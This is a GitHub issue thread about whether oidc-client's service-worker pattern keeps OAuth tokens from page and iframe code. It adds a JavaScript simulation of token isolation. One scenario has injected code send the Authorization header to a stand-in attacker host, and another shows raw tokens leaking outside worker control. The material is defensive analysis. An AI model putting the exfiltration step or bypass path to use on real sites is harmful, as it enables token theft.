Closed pgangwani closed 4 months ago
Good issue @pgangwani , I will detail a response + code + video very soon :)
The hidden FAQ gives an answer: https://github.com/AxaFrance/oidc-client/blob/main/FAQ.md#good-security-practices--does-a-hacker-can-unregister-the-service-worker-and-retrieve-tokens-via-an-iframe-
Nice information in the hidden gem and an apt reply to my security team. I understood. Thanks for the next detailed steps.
Issue and Steps to Reproduce
I got an update from my security team that ietf.org is drafting some observations on the service worker pattern, calling it "may be" secured, which they previously claimed to be the most secure method. Now, if you read 7.4.1.1. Attacking the Service Worker, specifically point number 2: Prevent an attacker from acquiring a new set of tokens
[image: payload-new-flow]
Steps I got are:
This issue is just to validate and prove that we are good and safe with the service worker approach.
Versions
any version
Screenshots
Expected
No code in the main window or in an iframe should be able to access any tokens with the service worker approach
Actual
Need to test whether the expected behaviour holds
Additional Details
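As an added illustration for this issue (written for this page, not code from the oidc-client project or its service worker), the block below is a plain-JavaScript model of the pattern under discussion: the worker keeps the real tokens in its own memory, hands the page only a placeholder, substitutes the real token into outgoing requests for allow-listed API origins, and rewrites every token-endpoint response before a window or iframe can read it. The three scenarios correspond to the "Expected" line above and to the IETF point about an attacker acquiring a new set of tokens: the model makes explicit that the guarantee rests on every token-endpoint response passing through the worker. It runs under Node with no real service worker; the endpoint URL, API origin, placeholder string and fake token response are all assumptions made for the example.

```javascript
// Added example, not oidc-client code: a plain-JS model of service-worker token isolation.
// Assumptions for illustration: endpoint URL, allow-listed API origin, placeholder string,
// and the constructed token response returned by fakeTokenEndpoint().

const TOKEN_ENDPOINT = "https://idp.example.com/oauth/token";
const API_ORIGINS = new Set(["https://api.example.com"]);
const ACCESS_TOKEN_PLACEHOLDER = "ACCESS_TOKEN_SECURED_BY_SERVICE_WORKER";

// Stand-in for the identity provider's token endpoint (constructed data; a real
// IdP would validate the grant first). Each call hands out a fresh token set.
let tokenCounter = 0;
function fakeTokenEndpoint() {
  tokenCounter += 1;
  return {
    access_token: `real-token-${tokenCounter}`,
    refresh_token: `real-refresh-${tokenCounter}`,
    token_type: "Bearer",
    expires_in: 3600,
  };
}

// State that exists only inside the worker; page and iframe code can only reach it
// indirectly, through the two hooks below (the `fetch` event in a real worker).
class WorkerTokenVault {
  constructor() {
    this.accessToken = null;
    this.refreshToken = null; // held for renewal, never handed to a client
  }

  // Outgoing request hook: replace the placeholder with the real token only when the
  // destination is an allow-listed API origin. For any other origin the Authorization
  // header is dropped, so neither the placeholder nor a real token leaves.
  rewriteRequest(url, headers) {
    const out = { ...headers };
    if (out.Authorization === `Bearer ${ACCESS_TOKEN_PLACEHOLDER}`) {
      if (API_ORIGINS.has(new URL(url).origin) && this.accessToken) {
        out.Authorization = `Bearer ${this.accessToken}`;
      } else {
        delete out.Authorization;
      }
    }
    return out;
  }

  // Incoming response hook: every token-endpoint response is rewritten before any
  // client context (main window or iframe) sees it. The refresh token is removed
  // entirely; the access token is replaced by the placeholder.
  rewriteResponse(url, body) {
    if (url !== TOKEN_ENDPOINT) return body;
    this.accessToken = body.access_token;
    this.refreshToken = body.refresh_token;
    const { refresh_token, ...visible } = body;
    return { ...visible, access_token: ACCESS_TOKEN_PLACEHOLDER };
  }
}

// Simulated fetch issued by page or iframe code. `workerActive` models whether this
// client is still controlled by the worker; when it is not, nothing is rewritten.
function pageFetch(vault, workerActive, url, headers = {}) {
  const sent = workerActive ? vault.rewriteRequest(url, headers) : { ...headers };
  const upstream = url === TOKEN_ENDPOINT
    ? fakeTokenEndpoint()
    : { echoedAuthorization: sent.Authorization ?? null }; // API echoes what it received
  return workerActive ? vault.rewriteResponse(url, upstream) : upstream;
}

// Scenario 1: legitimate flow. The page only ever holds the placeholder, yet the API
// receives the real token.
function legitimateFlow() {
  const vault = new WorkerTokenVault();
  const tokenResponse = pageFetch(vault, true, TOKEN_ENDPOINT);
  const api = pageFetch(vault, true, "https://api.example.com/me", {
    Authorization: `Bearer ${tokenResponse.access_token}`,
  });
  return {
    pageSees: tokenResponse.access_token,
    refreshVisible: "refresh_token" in tokenResponse,
    apiGotRealToken: api.echoedAuthorization === `Bearer ${vault.accessToken}`,
  };
}

// Scenario 2: injected code forwards the Authorization header to its own server.
function exfiltrationAttempt() {
  const vault = new WorkerTokenVault();
  const tokenResponse = pageFetch(vault, true, TOKEN_ENDPOINT);
  const evil = pageFetch(vault, true, "https://attacker.example/collect", {
    Authorization: `Bearer ${tokenResponse.access_token}`,
  });
  return evil.echoedAuthorization; // null: the worker stripped the header
}

// Scenario 3: the "acquire a new set of tokens" case. If injected code can reach the
// token endpoint from a client the worker no longer controls, the raw token set lands
// in page-accessible memory. Returns true when that happens.
function newFlowWithoutWorker() {
  const vault = new WorkerTokenVault();
  const tokenResponse = pageFetch(vault, false, TOKEN_ENDPOINT);
  return tokenResponse.access_token.startsWith("real-token-");
}
```

Scenario 3 is the one to take to a security review: the property in "Expected" holds only while every token-endpoint round trip is intercepted, so the question to answer for a given client/worker combination is whether injected code can create or reach a client context the worker does not control.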